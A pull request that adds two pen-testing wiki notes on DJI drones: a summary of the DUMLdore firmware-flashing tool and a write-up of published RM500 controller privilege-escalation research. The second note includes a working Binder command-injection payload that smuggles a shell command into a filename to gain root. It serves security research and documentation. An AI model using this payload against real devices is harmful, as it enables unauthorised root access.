### PR TITLE
docs(import): add DUMLdore fork and RM500 privilege escalation notes

### DIFF
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -409,6 +409,8 @@
   - [Video Guide](pen-testing/drones/video-guide.md)
   - [Rooting Mavic Pro in firmware with Force FCC and Boost and No NFZ](pen-testing/drones/rooting-mavic-pro-in-firmware-with-force-fcc-and-boost-and-no-nfz.md)
   - [dji-firmware-tools Github Repo](pen-testing/drones/dji-firmware-tools-github-repo.md)
+  - [DUMLdore (DevinNorgarb fork)](pen-testing/drones/github-devinnorgarb-dumldore.md)
+  - [DJI RM500 local privilege escalation (icanhack)](pen-testing/drones/icanhack-dji-rm500-privilege-escalation.md)
   - [How To Hack Wiki for DJI Drones](pen-testing/drones/how-to-hack-wiki-for-dji-drones.md)
   - [DIY DJI Aeroscope](pen-testing/drones/diy-dji-aeroscope.md)
   - [DJI Pilot Android Application Security Analysis](pen-testing/drones/synacktiv-dji-pilot-android-application-security-analysis.md)

--- a/pen-testing/drones/github-devinnorgarb-dumldore.md
+++ b/pen-testing/drones/github-devinnorgarb-dumldore.md
@@ -1,0 +1,59 @@
+---
+title: DUMLdore (DevinNorgarb fork) — firmware flashing tool
+description: Imported note from https://github.com/DevinNorgarb/DUMLdore
+---
+
+# DUMLdore (DevinNorgarb fork) — firmware flashing tool
+
+## Source
+- Type: webpage
+- Origin: https://github.com/DevinNorgarb/DUMLdore
+- Imported: 2026-04-21
+
+## Content
+This repository is described as **DUMLdore firmware flashing tool v3.20** (Windows-oriented workflow for DJI `dji_system.bin`-style updates).
+
+### Releases
+- Releases are linked from the upstream project: [jezzab/DUMLdore releases](https://github.com/jezzab/DUMLdore/releases)
+
+### Usage summary (from README)
+- Close **DJI Assistant 2** before use.
+- Connect USB from aircraft or RC to the PC, power on and wait for full boot.
+- Run **DUMLdoreV3.exe**.
+
+### UI actions described
+| Action | Purpose |
+|--------|---------|
+| **LOAD** | Load a firmware file for flashing |
+| **FLASH** | Upload firmware and start upgrade/downgrade |
+| **PULL UPGRADE LOGS** | Download last upgrade log (tar/gzip) |
+| **UNLOCK DEVICE** | Unlock devices grounded for missing a Sept 2017 firmware deadline |
+| **ACTIVATE DEVICE** | Offline activation for *some* devices (Mavic Pro, P4, Spark); results may vary |
+| **ADB ENABLE** | Enable ADB root shell quickly |
+| **DOWNLOAD FIRMWARE** | Link to DankDroneDownloader |
+
+### Compatibility (as listed)
+- **Aircraft:** P4, P4 Pro, Mavic, Spark, I2, Mavic Air  
+- **Remote:** Mavic  
+- **Goggles:** DJI (generic)
+
+### Operational note
+- README recommends **at least 50% battery** before flashing.
+
+### Related “DeejayeyeHackingClub” resources (README links)
+- [dji.retroroms.info](http://dji.retroroms.info/) wiki-style reference  
+- [fvantienen/dji_rev](https://github.com/fvantienen/dji_rev) — firmware RE tooling  
+- [Bin4ry/deejayeye-modder](https://github.com/Bin4ry/deejayeye-modder) — APK tweaks  
+- [hdnes/pyduml](https://github.com/hdnes/pyduml) — Assistant-less pushes / DUML-related workflows  
+- [MAVProxyUser/P0VsRedHerring](https://github.com/MAVProxyUser/P0VsRedHerring) — historical exploit context (README description)  
+- [MAVProxyUser/dji_system.bin](https://github.com/MAVProxyUser/dji_system.bin) — firmware archive by MD5  
+- [MAVProxyUser/firm_cache](https://github.com/MAVProxyUser/firm_cache) — extracted firmware contents  
+- [MAVProxyUser/DUMLrub](https://github.com/MAVProxyUser/DUMLrub) — Ruby DUML / cherry-picking  
+- [jezzab/DUMLdore](https://github.com/jezzab/DUMLdore) — original DUMLdore repo  
+- [MAVProxyUser/DJI_ftpd_aes_unscramble](https://github.com/MAVProxyUser/DJI_ftpd_aes_unscramble) — FTP AES unscramble for some products  
+- [darksimpson/jdjitools](https://github.com/darksimpson/jdjitools) — Java DJI tools collection  
+
+## Key Takeaways
+- Fork documents the same Windows flashing workflow as classic DUMLdore, with releases still pointed at **jezzab** upstream.
+- README is a practical checklist: Assistant off, USB, boot, then flash/load/logs/unlock paths.
+- Treat flashing and unlock/activation features as high-risk operations tied to specific legacy device support.

--- a/pen-testing/drones/icanhack-dji-rm500-privilege-escalation.md
+++ b/pen-testing/drones/icanhack-dji-rm500-privilege-escalation.md
@@ -1,0 +1,59 @@
+---
+title: Local privilege escalation on DJI RM500 (djilink / Binder)
+description: Imported note from https://icanhack.nl/blog/dji-rm500-privilege-escalation/
+---
+
+# Local privilege escalation on DJI RM500 (djilink / Binder)
+
+## Source
+- Type: webpage
+- Origin: https://icanhack.nl/blog/dji-rm500-privilege-escalation/
+- Imported: 2026-04-21
+
+## Content
+Blog by **Willem Melching** (Aug 6, 2023): escalating from default ADB `shell` to **`root`** on the **DJI RM500** smart controller (Android **7.1.2**, Linux **4.4.83**, **Rockchip RK3399**). Motivation in the post: bring up a USB–Ethernet adapter (`ifconfig eth0 up`) which requires root.
+
+### Preconditions (as stated)
+- Physical USB access to the remote.
+- First ADB connection requires accepting the on-device authorization prompt.
+
+### Attack surface triage
+- **`netstat -tulpn`:** listeners in `4000X` range; process ownership hidden without root.
+- **`ps`:** `/system/bin/djilink` and `/system/bin/dji_wms` run as **root**.
+- **`service list | grep -i dji`:** Binder services including **`djilink`** (`djilink: [djilink]`).
+
+### Obtaining filesystem / binary for analysis
+- Full OS update tarball available (example path in post): DankDroneDownloader → `V01.01.0072_rm500_dji_system.bin` (actually a **tar**).
+- Large `.pro.fw.sig` payload: ZIP after **480-byte** DJI-style header; `unzip` tolerates leading bytes.
+- `system.new.dat` + `system.transfer.list` → reconstruct ext4 with **[sdat2img](https://github.com/xpirt/sdat2img)**, then mount `system.img` and extract `/bin/djilink`.
+
+### Ghidra / `system()` review
+- Many `system()` call sites; author focuses on factory-test style code.
+- Vulnerable pattern: **`tinycap`** invoked via `system()` with a **user-controlled filename string** concatenated into the shell command without sanitization → **command injection** via `;`.
+
+### Binder invocation
+- Helper **`libdjilink.so`**: `BpLinkService::setMicStatus` packages **4× int32** + **String16** and calls transaction **1030** (`0x406`).
+- Working start example from post:
+
+```bash
+service call djilink 1030 i32 1 i32 1 i32 1 i32 1 s16 "/sdcard/test.wav"
+```
+
+### Exploit command (injection in filename)
+- Format string described: `tinycap %s -D 0 -d 0 -i %d -c %d -r 48000 -b 16 -t %d` with **128-char** total budget mentioned.
+- Example payload:
+
+```bash
+service call djilink 1030 i32 1 i32 1 i32 2 i32 1 s16 ";whoami > /sdcard/whoami;"
+```
+
+- Verified effect in post: `/sdcard/whoami` contains **`root`**.
+
+### Impact and disclosure context (author’s framing)
+- **Local** privilege escalation: needs physical access + ADB pairing acceptance.
+- RM500 discontinued; author notes **out of scope** for DJI bug bounty and discusses disclosure constraints.
+
+## Key Takeaways
+- Root-running **`djilink`** + Binder exposes high-value IPC; factory-test code paths are a classic weak spot.
+- **`system()`** with attacker-influenced strings is sufficient for **`;`**-style shell injection even under tight length limits.
+- Firmware packages can be unpacked offline to enable static analysis of privileged daemons without a rooted device first.


### PR DESCRIPTION
## Summary
- add `pen-testing/drones/github-devinnorgarb-dumldore.md` from the fork README (flashing workflow, UI actions, compatibility, related links)
- add `pen-testing/drones/icanhack-dji-rm500-privilege-escalation.md` summarizing the RM500 local privilege escalation research
- register both pages in `SUMMARY.md` under Pen Testing → Drones

## Test plan
- [x] Confirmed both new files include required frontmatter and Source sections
- [x] Confirmed `SUMMARY.md` paths match the new filenames

Made with [Cursor](https://cursor.com)